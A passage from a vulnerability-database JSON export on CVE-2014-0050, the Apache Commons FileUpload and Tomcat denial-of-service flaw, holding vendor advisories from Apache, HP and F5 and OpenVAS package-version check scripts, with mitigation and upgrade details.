be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit access to the Configuration utility only over a secure network.\n\nSupplemental Information\n\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2016-08-16T00:00:00", "published": "2014-04-18T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15189.html", "id": "SOL15189", "title": "SOL15189 - Apache Commons FileUpload vulnerability CVE-2014-0050", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- - Commons FileUpload 1.0 to 1.3\r\n- - Apache Tomcat 8.0.0-RC1 to 8.0.1\r\n- - Apache Tomcat 7.0.0 to 7.0.50\r\n- - Apache Tomcat 6 and earlier are not affected\r\n\r\nApache Tomcat 7 and Apache Tomcat 8 use a packaged renamed copy of\r\nApache Commons FileUpload to implement the requirement of the Servlet\r\n3.0 and later specifications to support the processing of\r\nmime-multipart requests. Tomcat 7 and 8 are therefore affected by this\r\nissue. 
While Tomcat 6 uses Commons FileUpload as part of the Manager\r\napplication, access to that functionality is limited to authenticated\r\nadministrators.\r\n\r\nDescription:\r\nIt is possible to craft a malformed Content-Type header for a\r\nmultipart request that causes Apache Commons FileUpload to enter an\r\ninfinite loop. A malicious user could, therefore, craft a malformed\r\nrequest that triggered a denial of service.\r\nThis issue was reported responsibly to the Apache Software Foundation\r\nvia JPCERT but an error in addressing an e-mail led to the unintended\r\nearly disclosure of this issue[1].\r\n\r\nMitigation:\r\nUsers of affected versions should apply one of the following mitigations\r\n- - Upgrade to Apache Commons FileUpload 1.3.1 or later once released\r\n- - Upgrade to Apache Tomcat 8.0.2 or later once released\r\n- - Upgrade to Apache Tomcat 7.0.51 or later once released\r\n- - Apply the appropriate patch\r\n - Commons FileUpload: http://svn.apache.org/r1565143\r\n - Tomcat 8: http://svn.apache.org/r1565163\r\n - Tomcat 7: http://svn.apache.org/r1565169\r\n- - Limit the size of the Content-Type header to less than 4091 bytes\r\n\r\nCredit:\r\nThis issue was reported to the Apache Software Foundation via JPCERT.\r\n\r\nReferences:\r\n[1] http://markmail.org/message/kpfl7ax4el2owb3o\r\n[2] http://tomcat.apache.org/security-8.html\r\n[3] http://tomcat.apache.org/security-7.html\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\nComment: Using GnuPG with Thunderbird - 
http://www.enigmail.net/\r\n\r\niQIcBAEBAgAGBQJS83P8AAoJEBDAHFovYFnnbOwP/0m80St7x63n6VCiR0aGuGLz\r\n/J004spHfbc+vtg2RumObBTX6mSfvPgO2R4FzE17Etg8QtWreoxb7kjnVXUwjdMX\r\nnb3Yt6IY1yBW1K+YcZRziOQXkRnnjnpC7Lh2o5eqpJ1S7wpXl5PBIXYSxMAsJCuv\r\naxFA0aq5cc17uDAH1z6DPk4149oZz2lHdlBUTTkCh/0PrvcIFxwpej75gUfyaV0y\r\nDGZLs3IpRYcJMS131q72DUt9wBsIqJN0mqUOq2svBS3mlXBcKDjy21b8QiEr8itK\r\nUqwsYUtOZP4nZ4u8j6euxF2fC/ivm/930OGOl9pn2SbkoHJKm/4rz2GYDA9jq07K\r\nXEDeGdTx3ZuDaTaBER8xquETRZ/Rb8dbBxQwzmo6doJNOjsMQFlR+1F+p56AhYd0\r\nklbT6Q7i/Ic3BdRJkUpaYshhtXeAOnH+0u9j4kRXMgJbkMgOacopomFX6HoXr9/i\r\nRHGbwwSZViLooR88Yg0FU2230+9mJLXxaJ6usHrtq4dS9ElSV320OCyisNjMX5hi\r\n5SFYMSy+z0nsK2O6yCzlukztoFhvaNecvy3I8w5EKytweyFlPzxXn6QpQjG+ffb5\r\nql7TZRrApiaewp4crzBcZSAjDzRNiQpcI2xTTN/H9u/yk8lrhOULi4pljKCudvmM\r\neIWblFdpoPVl0iqvsXA9\r\n=uzLf\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2014-03-31T00:00:00", "published": "2014-03-31T00:00:00", "id": "SECURITYVULNS:DOC:30435", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30435", "title": "[SECURITY] CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-2122", "CVE-2014-0050"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04657823\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04657823\r\nVersion: 1\r\n\r\nHPSBGN03329 rev.1 - HP SDN VAN Controller, Remote Denial of Service (DoS),\r\nDistributed Denial of Service (DDoS)\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2015-05-11\r\nLast Updated: 2015-05-11\r\n\r\nPotential 
Security Impact: Remote Denial of Service (DoS), Distributed Denial\r\nof Service (DDoS)\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP SDN VAN\r\nController. The vulnerabilities could be remotely exploited resulting in\r\nDenial of Service (DoS) or a Distributed Denial of Service (DDoS).\r\n\r\nReferences:\r\n\r\n CVE-2014-0050 Remote Denial of Service (DoS)\r\n\r\n CVE-2015-2122 Remote Distributed Denial of Service (DDoS)\r\n\r\n SSRT102049\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP SDN VAN Controller version 2.5 and earlier.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0050 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2015-2122 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP recommends either of the two following workarounds for the vulnerabilities\r\nin the HP SDN VAN Controller.\r\n\r\n - The network for the server running the HP SDN VAN Controller management\r\nVLAN should be on a separate and isolated "management" VLAN.\r\n\r\n - Configure the firewall on the server running HP SDN VAN Controller so\r\nthat the only network traffic allowed to the REST port is from trusted\r\nservers on the network that need to use the REST layer. 
For example: the\r\nMicrosoft Lync Server for Optimizer.\r\n\r\n For more detailed information, please refer to the "Securing REST layer\r\nAccess on HP VAN SDN Controllers" article at the following location:\r\n\r\n http://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=em\r\nr_na-c04676756\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 11 May 2015 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2015 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. 
The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlVQ3n0ACgkQ4B86/C0qfVleJgCg+qPCFTzdKRL5cLe4eNH7Q82V\r\nw80AoOpSvjMM19ssS++abLKV1S+kypwk\r\n=Wtwj\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2015-05-11T00:00:00", "published": "2015-05-11T00:00:00", "id": "SECURITYVULNS:DOC:32033", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32033", "title": "[security bulletin] HPSBGN03329 rev.1 - HP SDN VAN Controller, Remote Denial of Service (DoS), Distributed Denial of Service (DDoS)", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-2122", "CVE-2014-0050"], "description": "No description provided", "edition": 1, "modified": "2015-05-11T00:00:00", "published": "2015-05-11T00:00:00", "id": "SECURITYVULNS:VULN:14470", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14470", "title": "HP SDN VAN Controller DoS", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-25T10:48:25", "bulletinFamily": 
"scanner", "cvelist": ["CVE-2014-0050"], "description": "Check for the Version of apache-commons-fileupload", "modified": "2017-07-10T00:00:00", "published": "2014-02-20T00:00:00", "id": "OPENVAS:867523", "href": "http://plugins.openvas.org/nasl.php?oid=867523", "type": "openvas", "title": "Fedora Update for apache-commons-fileupload FEDORA-2014-2175", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apache-commons-fileupload FEDORA-2014-2175\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867523);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-20 15:08:39 +0530 (Thu, 20 Feb 2014)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for apache-commons-fileupload FEDORA-2014-2175\");\n\n tag_insight = \"The javax.servlet package lacks support for rfc 1867, html file\nupload. This package provides a simple to use api for working with\nsuch data. 
The scope of this package is to create a package of Java\nutility classes to read multipart/form-data within a\njavax.servlet.http.HttpServletRequest\n\";\n\n tag_affected = \"apache-commons-fileupload on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2175\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128499.html\");\n script_summary(\"Check for the Version of apache-commons-fileupload\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-fileupload\", rpm:\"apache-commons-fileupload~1.3~5.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:48:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "It was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.", "modified": "2017-07-11T00:00:00", "published": 
"2014-02-07T00:00:00", "id": "OPENVAS:702856", "href": "http://plugins.openvas.org/nasl.php?oid=702856", "type": "openvas", "title": "Debian Security Advisory DSA 2856-1 (libcommons-fileupload-java - denial of service)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2856.nasl 6663 2017-07-11 09:58:05Z teissa $\n# Auto-generated from advisory DSA 2856-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"libcommons-fileupload-java on Debian Linux\";\ntag_insight = \"The Commons FileUpload package makes it easy to add robust, high-performance,\nfile upload capability to your servlets and web applications.\";\ntag_solution = \"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.2.2-1+deb6u2.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.2-1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.1-1.\n\nWe recommend that you upgrade your libcommons-fileupload-java packages.\";\ntag_summary = \"It was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702856);\n script_version(\"$Revision: 6663 $\");\n script_cve_id(\"CVE-2014-0050\");\n script_name(\"Debian Security Advisory DSA 2856-1 (libcommons-fileupload-java - denial of service)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-02-07 00:00:00 +0100 (Fri, 07 Feb 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2856.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n 
script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", 
ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-03-17T23:01:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120359", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120359", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-312)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120359\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:24:34 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-312)\");\n script_tag(name:\"insight\", value:\"MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.\");\n script_tag(name:\"solution\", value:\"Run yum update tomcat7 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-312.html\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 
\"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-docs-webapp\", rpm:\"tomcat7-docs-webapp~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7\", rpm:\"tomcat7~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-lib\", rpm:\"tomcat7-lib~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-webapps\", rpm:\"tomcat7-webapps~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-el-2.2-api\", rpm:\"tomcat7-el-2.2-api~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-javadoc\", rpm:\"tomcat7-javadoc~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-jsp-2.2-api\", rpm:\"tomcat7-jsp-2.2-api~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-admin-webapps\", rpm:\"tomcat7-admin-webapps~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-servlet-3.0-api\", rpm:\"tomcat7-servlet-3.0-api~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7\", rpm:\"tomcat7~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "This host is running Apache Tomcat and is prone to denial of service\n vulnerability.", "modified": "2019-05-10T00:00:00", "published": "2014-03-24T00:00:00", "id": "OPENVAS:1361412562310804251", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310804251", "type": "openvas", "title": "Apache Tomcat Content-Type Header Denial Of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_tomcat_content_type_hdr_dos_vuln.nasl 35236 2014-03-24 15:09:34Z mar$\n#\n# Apache Tomcat Content-Type Header Denial Of Service Vulnerability\n#\n# Authors:\n# Shashi Kiran N <nskiran@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804251\");\n script_version(\"2019-05-10T11:41:35+0000\");\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-10 11:41:35 +0000 (Fri, 10 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-03-24 15:09:34 +0530 (Mon, 24 Mar 2014)\");\n script_name(\"Apache Tomcat Content-Type Header Denial Of Service Vulnerability\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\");\n script_mandatory_keys(\"apache/tomcat/detected\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56830\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/90987\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31615\");\n script_xref(name:\"URL\", value:\"http://blog.spiderlabs.com/2014/02/cve-2014-0050-exploit-with-boundaries-loops-without-boundaries.html\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Tomcat and is prone to denial of service\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper handling of Content-Type HTTP header for\n multipart requests\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to cause denial of\n service condition.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat version 7.0.x before 7.0.51 and 8.0.0 before 8.0.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to 7.0.51, 8.0.2 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) )\n exit( 0 );\n\nif( ! 
